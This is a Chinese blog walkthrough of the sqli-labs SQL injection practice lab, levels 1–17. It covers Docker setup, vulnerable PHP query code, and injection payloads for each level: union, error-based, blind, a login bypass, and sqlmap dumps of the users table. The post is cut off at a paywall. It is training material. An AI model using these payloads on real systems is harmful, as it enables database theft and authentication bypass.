sqlilabs通关()

最新推荐文章于 2024-05-18 15:04:49 发布
最新推荐文章于 2024-05-18 15:04:49 发布
阅读量1k 收藏 4
点赞数
文章标签: sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Forrest_bear/article/details/130022093
版权

文章目录

sqlilabs通关及常见的sql注入方式

首先搭建环境

我是使用centos7+docker上搭建的以下是详细步骤
如果是使用 win10+phpstudy搭建的话有些管卡可能会出现问题

1、安装docker

docker的安装步骤

2、配置sqlilabs环境

1、查找sqli-labs镜像
docker search sqli-labs

在这里插入图片描述
拉取镜像

docker pull acgpiano/sqli-labs

输入docker images
出现和下面一样就表示拉去镜像成功

[root@localhost /]# docker images
REPOSITORY           TAG       IMAGE ID       CREATED         SIZE
hello-world          latest    feb5d9fea6a5   19 months ago   13.3kB
acgpiano/sqli-labs   latest    0976afc45249   7 years ago     434MB

启动镜像

docker run --name=sqlilabs --net=host -p 80:80 -d acgpiano/sqli-labs

执行docker ps后出现下面的则表示启动服务成功

[root@192 ~]# docker ps
CONTAINER ID   IMAGE                COMMAND     CREATED         STATUS         PORTS     NAMES
42f2df53bf45   acgpiano/sqli-labs   "/run.sh"   6 minutes ago   Up 6 minutes             sqlilabs

进入容器
先从浏览器打开服务
在这里插入图片描述
而后进入容器

docker exec -it 42f2df53bf45 /bin/bash

输入mysql
在这里插入图片描述
最后点击这个
在这里插入图片描述
就完成配置了

基础挑战1~20关

Less1
请求方式 注入类型 拼接方式
GET 联合、报错、布尔盲注、延时盲注 ?id=‘$id’

源代码分析

$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
if(true){
   
输出查询的类容
}
else{
   
print_r(mysql_error());
}
1、联合查询注入
?id=1' union select 1,2,3--+
2、报错注入
?id=1' and updatexml(0x7e,concat(0x7e,database()),0x7e)--+
利用updatexm()函数在第二个参数不能出现特殊符号的规则,添加‘~’让其报错提示
?id=1' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security' limit 0,1)),3)--+
3、布尔盲注
?id=1' and length(database())=8--+
4、延时注入
?id=1' and if(ascii(substr(database(),1,1))=114,1,sleep(5))--+ 
?id=1' and if(ascii(substr(database(),1,1))=115,1,sleep(5))--+

sqlmap直接破解
python sqlmap.py -u "http://192.168.1.129/sqllilabs/Less-1/?id=1" -D security -T users -C  username,password d --dump
Less2
请求方式 注入类型 拼接方式
GET 联合、报错、布尔盲注、延时盲注 id=$id

和 Less-1 利用方式一致,只是闭合方式不一样而已,这里即不再啰嗦了。

Less3
请求方式 注入类型 拼接方式
GET 联合、报错、布尔盲注、延时盲注 id=(‘$id’)

和 Less-1 利用方式一致,只是闭合方式不一样而已,这里即不再啰嗦了。

Less4
请求方式 注入类型 拼接方式
GET 联合、报错、布尔盲注、延时盲注 id=(“$id”)

只是闭合方式复杂了一点

Less5
请求方式 注入类型 拼接方式
GET 报错、布尔盲注、延时盲注 id=‘$id’
源码简单分析
# 直接单引号拼接
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";

# 支持报错、布尔盲注、延时盲注
if true:
    输出 You are in...........
else:
    print_r(mysql_error());

因为在本关中没有回显效果,所以不能使用联合注入。但其它与第一关一致

Less6
请求方式 注入类型 拼接方式
GET 报错、布尔盲注、延时盲注 id=”$id“

和 Less-5 利用方式一致,只是闭合方式不一样,这里即不再啰嗦了。

Less7
请求方式 注入类型 拼接方式
GET 布尔盲注、延时盲注 id=((‘$id’)) 
sql语句的拼接方式
$sql="SELECT * FROM users WHERE id=(('$id')) LIMIT 0,1";
if true:
    输出 You are in.... Use outfile......
else:
    输出 You have an error in your SQL syntax
  //print_r(mysql_error());

因为这里把 print_r(mysql_error())给注释掉了,所以就不可以使用报错注入了,这个时候只能使用布尔盲注和延时盲注。

Less8
请求方式 注入类型 拼接方式
GET 布尔盲注、延时盲注 id=‘$id’

和 Less-7 注入方式一致,只是拼接方式不一样,这里国光就不再啰嗦了。

Less9
请求方式 注入类型 拼接方式
GET 延时盲注 id=‘$id’ 
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
# 支持延时盲注
if true:
    输出 You are in............
else:
    输出 You are in...........

源码中可以看到 if else 都输出的是 You are in………… 这样就不能通过布尔盲注来进行注入了,只能用延时注入。

Less10
请求方式 注入类型 拼接方式
GET 延时盲注 id=”$id“

和 Less-9 利用方式一样,只是拼接方式不一样,具体可以参考 Less-9

Less11
请求方式 注入类型 拼接方式
POST 联合、报错、布尔盲注、延时盲注 username=‘x’

源码简要分析:

$uname=$_POST['uname'];
$passwd=$_POST['passwd'];

@$sql="SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1";
if true:
    输出查询的信息
else:
    print_r(mysql_error());

通过查看源代码可以看出核心代码仅用单引号包裹,可以使用如下 Payload 来登录系统:

uname=admin'--+&passwd=&submit=Submit
uname=admin'#&passwd=&submit=Submit

# 注释后面语句 并 添加一个永真条件
uname=admin&passwd=1' or 1--+&submit=Submit
1、联合查询注入
uname=admin&passwd=1'union select 1,(SELECT GROUP_CONCAT(username,password) FROM users)#&submit=Submit
2、报错注入
uname=&passwd=1' and updatexml(0x7e,concat(0x7e,(select group_concat(username,password) from users)),0x7e)#&submit=Submit
3、布尔盲注
uname=admin' and left(database(),1)>'r'#&passwd=&submit=Submit
4、延时盲注
uname=admin' and if(ascii(substr(database(),1,1))>114,1,sleep(5))#&passwd=&submit=Submit
5、sqlmap

将burpsuit抓取的数据包打包到 1.txt

POST /sqllilabs/Less-11/ HTTP/1.1
Host: 192.168.1.129
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 28
Origin: http://192.168.1.129
Connection: close
Referer: http://192.168.1.129/sqllilabs/Less-11/
Upgrade-Insecure-Requests: 1

uname=&passwd=&submit=Submit

通用的sqlmap 注入方式

python sqlmap.py -r F:\tools\sqlmap\1.txt -D security -T users --dump

选用特定的sql注入方式,选用 --technique (B、E、T、U)分别为bool,error,time,union

布尔盲注
python sqlmap.py -r F:\tools\sqlmap\1.txt --dbs  --technique=B
报错盲注
python sqlmap.py -r F:\tools\sqlmap\1.txt --dbs  --technique=E
联合注入
python sqlmap.py -r F:\tools\sqlmap\1.txt --dbs  --technique=U
时间盲注
python sqlmap.py -r F:\tools\sqlmap\1.txt --dbs  --technique=T
Less12
请求方式 注入类型 拼接方式
POST 联合、报错、布尔盲注、延时盲注 username=(‘x’)

和 Less-11 的利用方式一样,只是 SQL 拼接方式不同,这里就不再啰嗦了。

Less13
请求方式 注入类型 拼接方式
POST 报错、延时盲注 username=(‘x’)

源码样式

# POST 方式接受变量
$uname=$_POST['uname'];
$passwd=$_POST['passwd'];

# 使用单引号和括号来拼接 SQL
@$sql="SELECT username, password FROM users WHERE username=('$uname') and password=('$passwd') LIMIT 0,1";

if true:
    并没有输出啥信息
else:
    print_r(mysql_error());

因为没有输出查询后的信息的原因,所以相对于 Less-11 和 Less-12 来说就少了 联合查询的注入方式,其他还是换汤不换药,这里就不再赘述了。

Less14
请求方式 注入类型 拼接方式
POST 报错、延时盲注 username=“x”

和 Less-13 异曲同工,只是拼接方式不一样,我们换对应的闭合方式即可进行注入。

Less15
请求方式 注入类型 拼接方式
POST 延时盲注 username=‘x’

源码简要分析:

$uname=$_POST['uname'];
$passwd=$_POST['passwd'];
@$sql="SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1";

if true
	什么也没输出
else
 	也是什么也没输出

及没回显,也没有报错日志,并且正确和错误显示都一样,所以只能用延时注入

Less16
请求方式 注入类型 拼接方式
POST 延时盲注 username=(“x”)

和 Less-15 注入类型一致,更换对应的闭合方式即可。

Less17
请求方式 注入类型 拼接方式
POST 报错、延时盲注 password = ‘$passwd’
1、简单源码分析
# uname 参数被过滤了
$uname=check_input($_POST['uname']);  
$passwd=$_POST['passwd'];

# SELECT 语句只获取了 uname 参数 但是被过滤了 没戏
@$sql="SELECT username, password FROM users WHERE username= $uname
最低0.47元/天 解锁文章
Forrest_bear
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
sqlilabs过关手册注入天书
08-17
sqlilabs过关手册注入天书
sqlilabs过关手册注入天书,过关sqlliabs的绝佳手册
06-28
Sqli-labs安装需要安装以下环境 apache+mysql+php Sqli-labs安装 将之前下载的源码解压到web目录下,linux的apache为 /var/www/html下,windows下的wamp解压在www目录下。 修改sql-connections/db-creds.inc文件当中...
sqli-lib靶场1-15关通关教程
m0_56109788的博客
04-25 1161
sqli-lib靶场1-15关通关教程
sqli-labs 通关日志 萌新向
春日野穹
11-16 1725
0x0 引言 sqli-labs是一个用来练习sql注入的平台,其内置集成了现存的各种sql注入,如盲注,联合查询注入等,对于新手来说它是一个十分不错的练习平台,我们可以使用它来进行各种注入尝试,从而提升我们的sql注入能力 萌新建议先看这个帖子再来做题:https://blog.csdn.net/chest_/article/details/102537988 目录快速导航 环境的搭...
详细sqli-labs(1-20)通关讲解
最新发布
m0_57928318的博客
05-18 1214
获取数据库名时可以使用 left() 函数,这里使用 substr() 函数截取数据库名的每个字符,然后使用 ASCII() 函数判断这个字符的 ASCII 码值。我们可以看出,GET 方式和post 方式 的区别,GET方式 可以明显的 从 URL 中进行注入,POST可以在数据包中进行修改对应的字段来进行 SQL 注入。获取数据库名时,使用 LEFT() 函数进行穷举法的效率较低,使用 substr() 函数结合 ASCII() 函数进行判断可以使用二分法快速缩小范围。
sql-lib 1-10关
鸣蜩十四的博客
06-14 650
1. 字符型 http://127.0.0.1:88/sql/Less-1/?id=1' order by 4%23失败 http://127.0.0.1:88/sql/Less-1/?id=1' order by 3%23成功 http://127.0.0.1:88/sql/Less-1/?id=-1' union select 1,database(),group_concat(schema_name) from information_schema.schemata%23 查看所有数据库 ht...
Sqli-labs通关攻略(持续更新ing
qq_50808416的博客
05-11 1421
sqli-labs详细攻略
web靶场 --- sqli-labs
L0g1c的博客
07-06 1317
SQL注入的本质是用户输入的数据被当作代码执行mysql语法:查库: 查表:查列:查字段: 查看是否有注入 确实存在SQL注入漏洞查看有多少列先使用 再使用 所以得到users表有3列查看哪些数据可以回显[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-drLNqXTv-1657118499948)(https://raw.githubusercontent.com/Ckingt-k/photos/main/image-20220706192047368.png)]查看当前数
sqli-labs (less-24)
kukudeshuo的博客
03-12 342
sqli-labs (less-24) 进入24关,输入用户名和密码,登入后会显示你的用户名,下面的输入框就是改密码 我在输入用户名和密码的位置试了很多次,发现用户名和密码的位置是没有注入点的 这里我们先点击右下角的 New User click here?,创建一个admin’#的账户,密码为123456 回到主页面后,使用创建的admin’#账户进行登入 在这里更改admin的密码,将123456改为159357 这时我们再回到主页面,发现我们可以使用159357登入admin的账户 这关的
在线sqli-labs 通关大全 Less-3
qq_44985415的博客
08-31 420
sqli-labs (2) 励志语录 学习知识要善于思考,思考,再思考。——爱因斯坦 1.知识点 (1)字符型:’) (2)sqlmap使用 2.题解 注:因题目简单所以下解题步骤大多以图片显示不再做过多解释 方法一:手工注入 图一 图二 注意看图二图三有什么不同,图二是第三关的,而图三是第一关的解题步骤,本关sql注入在单引号的条件下又多了一个右括号,因此想绕过需要把右括号也加上 图三 右括号加上之后在进行实验发现返回结果正常 图四 猜字段 图五 用下面这条语句爆库名,将id=1换成了id=-1,因
Sqli-libs通关详解__第一关
henghengzhao_的博客
10-04 874
sqli-libs通关详解,第一关通关详解
sqli-lib64关闯关笔记学习资料.zip
08-22
总结的64关笔记,有之前师傅写的,也有我写的,可以作为参考,只要是存到这里防止丢失,有喜欢的朋友可以一起下载看看,学习一下,我常用的环境是WAMP。
sqli-labs闯关小游戏21-65.docx
10-23
这是个关于sql注入的文档,是sqli-labs闯关小游戏二十一关到六十五关的详解,每一关的步骤写得都很详细,前二十关的话我已经发布了博客,有需要的可以下载一下。
sqlilabs.rar
07-04
sql-lab新版靶场,可以自己搭在虚拟机上练习sql注入
安装sqli-labs
10-22
安装完成sqli-labs靶场环境后,可以根据关卡信息练习,结合write up(通关指南)和手工测试工具使用sqli-labs靶场环境。 总结 安装sqli-labs靶场环境可以提供一个安全和合法的环境来学习和实践Web应用安全。通过...
sqlilabs过关手册注入天书.pdf
09-14
sqlilabs过关手册注入天书.pdf
渗透学习-SQL注入篇-靶场篇-Sql-lib详细的解决过程(1-65关的个人解决思路 2022.6.8 )
qq_43696276的博客
05-04 5051
在经过上一篇的sql基础学习后,以下将正式进入靶场的学习与训练当中。本文以下将进行对sql-libs靶场的学习,1-65关全攻略。
SQLi-LABS(1~10关详解)
CTF小白的博客
09-22 6438
目录SQLi-LABS Less-1查看题目环境测试注入点SQL注入查找列数查询数据库查询数据库中的表查表中的字段查数据SQLi-LABS Less-2查看题目环境测试注入点SQL注入查找列数查询数据库查询数据库中的表查表中的字段查数据SQLi-LABS Less-3查看题目环境测试注入点SQL注入查找列数查询数据库查询数据库中的表查表中的字段查数据SQLi-LABS Less-4查看题目环境测试...
sqli-labs 靶场通关(11-22)
知世郎
10-16 233
前十关使用的是get请求,参数都体现在url上面,而从十一关开始是post请求,参数是在表单里面。1' ,2, (extractvalue(1,concat(0x5c,(select group_concat(password,username) from users),0x5c)))# 爆账户密码。1',2,updatexml (1,concat(0x5c,(select group_concat(username,password) from users),0x5c),1))# 爆账户密码。
sqlilabs靶场通关
09-26
Sqlilabs是一个SQL注入漏洞靶场,它主要用于学习和测试SQL注入漏洞。靶场中包含了多个关卡,每个关卡都涉及不同的SQL注入场景和挑战。通过完成每个关卡,你可以逐步学习和掌握SQL注入的技巧和方法。 要通关Sqlilabs靶场,你需要按照每个关卡的要求,使用适当的SQL注入技巧来绕过安全防护并获取相应的信息。每个关卡都有不同的目标,你需要分析目标页面的参数,并尝试构造恰当的SQL注入语句来实现目标。 因为Sqlilabs靶场包含了多个关卡,每个关卡都有不同的挑战和难度,所以通关整个靶场需要有坚实的SQL注入基础和经验。你可以利用靶场中的提示和文档来帮助你解决问题,同时也可以参考相关的SQL注入资料和教程来扩展你的知识。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值